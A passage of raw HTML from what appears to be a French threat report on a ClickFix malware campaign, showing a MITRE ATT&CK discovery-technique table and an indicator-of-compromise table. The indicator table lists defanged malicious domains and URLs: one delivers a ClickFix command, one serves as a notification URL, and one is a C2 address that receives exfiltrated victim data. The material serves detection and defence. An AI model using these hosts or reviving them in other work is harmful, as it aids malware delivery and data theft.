display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_32\" spellcheck=\"false\">Discovery<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_74984036\" class=\"td_class_74984036 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_74984036\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_33\" spellcheck=\"false\"><a class=\"external-link\" draggable=\"false\" href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1087<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_87787990\" class=\"td_class_87787990 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_87787990\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_34\" spellcheck=\"false\">Account Discovery<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6649626\" id=\"tr_id_6649626\" data-draggable=\"true\" style=\"\"><td id=\"td_id_33869432\" class=\"td_class_33869432 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_33869432\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_35\" spellcheck=\"false\">Discovery<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73693775\" class=\"td_class_73693775 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_73693775\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_36\" spellcheck=\"false\"><a class=\"external-link\" href=\"https:\/\/attack.mitre.org\/techniques\/T1518\/001\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1518.001<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_37284358\" class=\"td_class_37284358 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_37284358\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_37\" spellcheck=\"false\">Software Discovery: Security Software Discovery<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_8232183\" id=\"tr_id_8232183\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\" draggable=\"false\"><td id=\"td_id_20346891\" class=\"td_class_20346891 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_20346891\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_38\" spellcheck=\"false\">Discovery<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_43848522\" class=\"td_class_43848522 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_43848522\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-edit-focus\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_39\" spellcheck=\"false\"><a class=\"external-link\" draggable=\"false\" href=\"https:\/\/attack.mitre.org\/techniques\/T1124\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1124<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_46468988\" class=\"td_class_46468988 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_46468988\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_40\" spellcheck=\"false\">System Time Discovery<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n\n<p>L'\u00e9quivalent renseign\u00e9 dans la matrice MITRE donne ce visuel\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774037\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h2>IOCs identifi\u00e9s<\/h2>\n<div class=\"ntb_table_wrapper ninja_table_builder_instance_2\"\n     id='ninja_table_builder_774042'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_2\"\n     style=\"\n     max-height:2000px;\n     max-width: 745px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_774042 ntb_774042\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\"><tr class=\"desktop-view tr_class_8020119\" id=\"tr_id_8020119\" data-draggable=\"true\" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_48183638\" class=\"td_class_48183638 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_48183638\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_0\" spellcheck=\"false\"><strong>Type<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73101400\" class=\"td_class_73101400 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_73101400\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_2\" spellcheck=\"false\"><strong>Usage<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_18012128\" class=\"td_class_18012128 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_18012128\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_3\" spellcheck=\"false\"><strong>Valeur<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_40603794\" class=\"td_class_40603794 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_40603794\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_4\" spellcheck=\"false\"><strong>Description<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_9698784\" id=\"tr_id_9698784\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_52125172\" class=\"td_class_52125172 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_52125172\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_5\" spellcheck=\"false\">Domaine<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_70761618\" class=\"td_class_70761618 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_70761618\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_6\" spellcheck=\"false\">ClickFix<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_77633715\" class=\"td_class_77633715 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_77633715\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_7\" spellcheck=\"false\">accountpulsecentre.help<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_90354974\" class=\"td_class_90354974 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_90354974\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_8\" spellcheck=\"false\">Site malveillant exploitant la technique ClickFix et fournissant la commande malveillante initiale.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_4584175\" id=\"tr_id_4584175\" data-draggable=\"true\"><td id=\"td_id_90845977\" class=\"td_class_90845977 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_90845977\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_9\" spellcheck=\"false\">Domaine<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_25767717\" class=\"td_class_25767717 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_25767717\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_10\" spellcheck=\"false\">Payload n\u00b01<br>C2 n\u00b01<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_11055040\" class=\"td_class_11055040 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_11055040\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_11\" spellcheck=\"false\">wiosyrondaty.com<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_11083368\" class=\"td_class_11083368 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_11083368\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_12\" spellcheck=\"false\">Fourniture d'un premier payload en PowerShell.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6615631\" id=\"tr_id_6615631\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_32993805\" class=\"td_class_32993805 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_32993805\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_13\" spellcheck=\"false\">URL<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73585666\" class=\"td_class_73585666 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_73585666\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_14\" spellcheck=\"false\">ClickFix<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_52612491\" class=\"td_class_52612491 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_52612491\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_15\" spellcheck=\"false\">https[:]\/\/accountpulsecentre[.]help\/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_35812162\" class=\"td_class_35812162 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_35812162\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_16\" spellcheck=\"false\">Fourniture de commande ClickFix.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_1781586\" id=\"tr_id_1781586\" data-draggable=\"true\"><td id=\"td_id_71039741\" class=\"td_class_71039741 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_71039741\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_17\" spellcheck=\"false\">URL<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_78429750\" class=\"td_class_78429750 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_78429750\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_18\" spellcheck=\"false\">ClickFix<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_18512360\" class=\"td_class_18512360 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_18512360\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_19\" spellcheck=\"false\">https[:]\/\/accountpulsecentre[.]help\/ern\u2011ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_18132291\" class=\"td_class_18132291 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_18132291\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_20\" spellcheck=\"false\">URL de notification informant qu'un utilisateur a copi\u00e9 la commande malveillante dans son presse-papiers.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_3000275\" id=\"tr_id_3000275\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_36894963\" class=\"td_class_36894963 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_36894963\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_21\" spellcheck=\"false\">URL<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_15728405\" class=\"td_class_15728405 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_15728405\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_22\" spellcheck=\"false\">C2 n\u00b01<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_17679530\" class=\"td_class_17679530 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_17679530\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_23\" spellcheck=\"false\">https[:]\/\/wiosyrondaty[.]com\/0I7IRN3o4o8GefoYto39mLjnEmdxcEEK73hReyAT6-A<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_46907025\" class=\"td_class_46907025 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_46907025\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_24\" spellcheck=\"false\">URL utilis\u00e9e pour exfiltrer les informations d\u00e9couvertes sur le syst\u00e8me de la victime. Les informations sont transmises en param\u00e8tre de requ\u00eate GET.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_7181125\" id=\"tr_id_7181125\" data-draggable=\"true\"><td id=\"td_id_71926392\" class=\"td_class_71926392 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_71926392\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_25\" spellcheck=\"false\">Domaine<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_60390830\" class=\"td_class_60390830 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_60390830\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_26\" spellcheck=\"false\">Payload n\u00b02<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_72752363\" class=\"td_class_72752363 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_72752363\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_27\" spellcheck=\"false\">hailmeinc[.]com<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_83713189\" class=\"td_class_83713189 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_83713189\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_28\" spellcheck=\"false\">C2 d'un autre payload.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6580949\" id=\"tr_id_6580949\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_72390181\" class=\"td_class_72390181 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_72390181\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_29\" 